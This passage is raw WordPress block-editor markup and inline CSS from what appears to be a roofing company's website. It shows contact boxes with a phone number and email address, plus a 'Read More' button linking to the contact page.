.block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5a7066fe-d425-4153-8844-d8ae7a4116af\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"6836f24b-2686-4a49-bdc2-b859683a37cf\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000&nbsp;</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"2019a28c-9fe4-4261-8545-472fe8f25e18\"} -->\n<style type=\"text/css\"> .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2019a28c-9fe4-4261-8545-472fe8f25e18\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"eb27f5f4-746e-46f7-8c6c-1546ed348b06\"} -->\n<style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"781513a3-174d-4594-86c8-5daf7f32af16\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-781513a3-174d-4594-86c8-5daf7f32af16 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"fead57cb-9c5c-411a-bb72-20bd150b5268\"} -->\n<style type=\"text/css\"> .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-fead57cb-9c5c-411a-bb72-20bd150b5268 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-fead57cb-9c5c-411a-bb72-20bd150b5268 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"leftPadding\":15,\"leftPaddingTablet\":15,\"blockId\":\"57952f87-1484-4ebd-851f-822a3d450cc3\"} -->\n<style type=\"text/css\"> .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-57952f87-1484-4ebd-851f-822a3d450cc3 